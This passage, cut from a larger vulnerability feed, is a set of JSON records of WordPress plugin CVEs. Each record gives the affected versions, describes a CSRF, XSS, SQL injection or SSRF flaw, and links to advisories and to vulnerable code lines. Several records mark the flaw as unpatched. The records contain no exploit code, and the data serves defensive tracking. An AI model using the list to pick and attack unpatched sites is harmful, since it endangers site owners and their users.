page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49460db5-a0cd-4b29-85f2-8ededabf5599?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49460db5-a0cd-4b29-85f2-8ededabf5599?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-proof-testimonials-slider\\\/tags\\\/2.2.4\\\/public\\\/class-social-proof-slider-public.php#L754\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-proof-testimonials-slider\\\/tags\\\/2.2.4\\\/public\\\/class-social-proof-slider-public.php#L754\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-proof-testimonials-slider\\\/trunk\\\/public\\\/class-social-proof-slider-public.php#L427\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-proof-testimonials-slider\\\/trunk\\\/public\\\/class-social-proof-slider-public.php#L427\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/social-proof-testimonials-slider\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/social-proof-testimonials-slider\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0807","slug":"cits-support-svg-webp-media-upload","versionImpact":"4.2","description":"The CITS Support svg, webp Media and TTF,OTF File Upload, Use Custom Fonts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.2. This is due to missing or incorrect nonce validation on the cits_settings_tab() function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cits-support-svg-webp-media-upload\\\/trunk\\\/includes\\\/cits-custom-fonts.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cits-support-svg-webp-media-upload\\\/trunk\\\/includes\\\/cits-custom-fonts.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3772ddad-4960-48c8-904e-2457d12bd01c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3772ddad-4960-48c8-904e-2457d12bd01c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5055","slug":"smart-forms","versionImpact":"2.6.98","description":"The Smart Forms \u2013 when you need more than just a contact form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.6.98 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smart-forms\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smart-forms\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f52cbb4-8fe3-4402-8ece-261d32329a42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f52cbb4-8fe3-4402-8ece-261d32329a42?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0727","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_delete_folder function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62b56928-7125-4211-b233-07b5b51881c1\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62b56928-7125-4211-b233-07b5b51881c1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5975","slug":"imagemapper","versionImpact":"1.2.6","description":"The ImageMapper plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.6. This is due to missing or incorrect nonce validation on multiple functions. This makes it possible for unauthenticated attackers to update the plugin settings via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a128018b-f19b-4b18-a53c-cf1310d3d0e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a128018b-f19b-4b18-a53c-cf1310d3d0e7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L904\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L904\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L916\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L916\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L939\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L939\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L958\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L958\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50856","slug":"funnel-builder","versionImpact":"2.14.3","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in FunnelKit Funnel Builder for WordPress by FunnelKit \u2013 Customize WooCommerce Checkout Pages, Create Sales Funnels & Maximize Profits.This issue affects Funnel Builder for WordPress by FunnelKit \u2013 Customize WooCommerce Checkout Pages, Create Sales Funnels & Maximize Profits: from n\/a through 2.14.3.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/funnel-builder\\\/wordpress-funnel-builder-for-wordpress-by-funnelkit-plugin-2-14-3-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/funnel-builder\\\/wordpress-funnel-builder-for-wordpress-by-funnelkit-plugin-2-14-3-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1408","slug":"wp-user-avatar","versionImpact":"4.14.4","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's edit-profile-text-box shortcode in all versions up to, and including, 4.14.4 due to insufficient input sanitization and output escaping on user supplied attributes such as 'type'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e50081f-6658-4cc7-bf0a-d04464820926?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e50081f-6658-4cc7-bf0a-d04464820926?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/wp-user-avatar\\\/blob\\\/fde360946c86d67610d8f95a82752199ce25b39a\\\/wp-user-avatar\\\/sr\\\/ShortcodeParser\\\/Builder\\\/FieldsShortcodeCallback.php#L524\",\"name\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/wp-user-avatar\\\/blob\\\/fde360946c86d67610d8f95a82752199ce25b39a\\\/wp-user-avatar\\\/sr\\\/ShortcodeParser\\\/Builder\\\/FieldsShortcodeCallback.php#L524\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0614","slug":"events-manager","versionImpact":"6.4.6.4","description":"The Events Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 6.4.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6288fddf-926f-4506-94de-696e0a23766d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6288fddf-926f-4506-94de-696e0a23766d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2024-0614\",\"name\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2024-0614\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042128\\\/events-manager\\\/trunk\\\/admin\\\/em-options.php?old=2769385&old_path=events-manager\\\/trunk\\\/admin\\\/em-options.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042128\\\/events-manager\\\/trunk\\\/admin\\\/em-options.php?old=2769385&old_path=events-manager\\\/trunk\\\/admin\\\/em-options.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4382","slug":"commons-booking","versionImpact":"0.9.4.18","description":"The CB (legacy) WordPress plugin through 0.9.4.18 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting codes, timeframes, and bookings via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1a67aeab-8145-4c8a-9c18-e6436fa39b63\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1a67aeab-8145-4c8a-9c18-e6436fa39b63\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9455","slug":"wp-cleanup-and-basic-functions","versionImpact":"2.2.1","description":"The WP Cleanup and Basic Functions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28bdaf44-6f2c-440a-a96f-bdcd71fb7bea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28bdaf44-6f2c-440a-a96f-bdcd71fb7bea?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-cleanup-and-basic-functions\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-cleanup-and-basic-functions\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9589","slug":"wp-custom-taxonomy-meta","versionImpact":"1.0.0","description":"The Category and Taxonomy Meta Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'new_meta_name' parameter in the 'wpaft_option_page' function in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with administrator-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d879fc6-97ec-4ecb-99c8-7fc0b91692ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d879fc6-97ec-4ecb-99c8-7fc0b91692ef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-custom-taxonomy-meta\\\/trunk\\\/includes\\\/options.php?rev=1196908#L232\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-custom-taxonomy-meta\\\/trunk\\\/includes\\\/options.php?rev=1196908#L232\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8874","slug":"ajax-login-and-registration-modal-popup","versionImpact":"2.24","description":"The AJAX Login and Registration modal popup + inline form plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.24. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c11a561a-c798-46e7-bf2d-12933978aa29?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c11a561a-c798-46e7-bf2d-12933978aa29?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-login-and-registration-modal-popup\\\/trunk\\\/includes\\\/class-settings.php#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-login-and-registration-modal-popup\\\/trunk\\\/includes\\\/class-settings.php#L177\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13856","slug":"make-builder","versionImpact":"1.1.10","description":"The Your Friendly Drag and Drop Page Builder \u2014 Make Builder plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.1.10 via the make_builder_ajax_subscribe() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/make-builder\\\/trunk\\\/plugins-screen.php#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/make-builder\\\/trunk\\\/plugins-screen.php#L83\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3259333%40make-builder%2Ftrunk&old=2235851%40make-builder%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3259333%40make-builder%2Ftrunk&old=2235851%40make-builder%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/make-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/make-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ffcb74b-230b-4629-b22d-5db96ac5fa06?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ffcb74b-230b-4629-b22d-5db96ac5fa06?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3869","slug":"4stats","versionImpact":"2.0.9","description":"The 4stats plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.9. This is due to missing or incorrect nonce validation on the stats\/stats.php page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/4stats\\\/tags\\\/2.0.9\\\/4stats.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/4stats\\\/tags\\\/2.0.9\\\/4stats.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/4stats\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/4stats\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/453b246f-7e39-4adb-9506-77d96146ab50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/453b246f-7e39-4adb-9506-77d96146ab50?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0723","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_move_object function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc01108f-e781-484b-997a-c1d4e218a3f4\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc01108f-e781-484b-997a-c1d4e218a3f4\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0292","slug":"quiz-master-next","versionImpact":"8.0.8","description":"The Quiz And Survey Master plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 8.0.8. This is due to missing nonce validation on the function associated with the qsm_remove_file_fd_question AJAX action. This makes it possible for unauthenticated attackers to delete arbitrary media files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/171011\\\/wpqsm808-xsrf.txt\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/171011\\\/wpqsm808-xsrf.txt\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2834471\\\/quiz-master-next\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2834471\\\/quiz-master-next\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c75e6d27-7f6b-4bec-b653-c2024504f427?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c75e6d27-7f6b-4bec-b653-c2024504f427?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quiz-master-next\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quiz-master-next\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2143","slug":"enable-svg-webp-ico-upload","versionImpact":"1.0.3","description":"The Enable SVG, WebP & ICO Upload WordPress plugin through 1.0.3 does not sanitize SVG file contents, leading to a Cross-Site Scripting vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91898762-aa7d-4fbc-a016-3de48901e5de\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91898762-aa7d-4fbc-a016-3de48901e5de\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5743","slug":"telephone-number-linker","versionImpact":"1.2","description":"The Telephone Number Linker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'telnumlink' shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06424d9f-0064-4101-b819-688489a18eee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06424d9f-0064-4101-b819-688489a18eee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/telephone-number-linker\\\/tags\\\/1.2\\\/telnumlinker.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/telephone-number-linker\\\/tags\\\/1.2\\\/telnumlinker.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/telephone-number-linker\\\/tags\\\/1.2\\\/telnumlinker.php#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/telephone-number-linker\\\/tags\\\/1.2\\\/telnumlinker.php#L36\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1390","slug":"paid-member-subscriptions","versionImpact":"2.11.1","description":"The Paid Membership Subscriptions \u2013 Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the creating_pricing_table_page function in all versions up to, and including, 2.11.1. This makes it possible for authenticated attackers, with subscriber access or higher, to create pricing tables.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10f00859-3adf-40ff-8f33-827bbb1f62df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10f00859-3adf-40ff-8f33-827bbb1f62df?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-member-subscriptions\\\/trunk\\\/includes\\\/admin\\\/class-admin-subscription-plans.php#L477\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-member-subscriptions\\\/trunk\\\/includes\\\/admin\\\/class-admin-subscription-plans.php#L477\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034497%40paid-member-subscriptions%2Ftrunk&old=3031453%40paid-member-subscriptions%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034497%40paid-member-subscriptions%2Ftrunk&old=3031453%40paid-member-subscriptions%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4700","slug":"wp-table-builder","versionImpact":"1.4.14","description":"The WP Table Builder \u2013 WordPress Table Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the button element in all versions up to, and including, 1.4.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default, this can only be exploited by administrators, but the ability to use and configure WP Table Builder can be extended to contributors.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20cd08ac-826f-40dd-804a-546b0c334b66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20cd08ac-826f-40dd-804a-546b0c334b66?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-table-builder\\\/trunk\\\/inc\\\/admin\\\/element-classes\\\/elements\\\/button-element.php#L343\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-table-builder\\\/trunk\\\/inc\\\/admin\\\/element-classes\\\/elements\\\/button-element.php#L343\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088612\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088612\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-table-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-table-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4381","slug":"commons-booking","versionImpact":"0.9.4.18","description":"The CB (legacy) WordPress plugin through 0.9.4.18 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9b3cda9a-17a7-4173-93a2-d552a874fae9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9b3cda9a-17a7-4173-93a2-d552a874fae9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
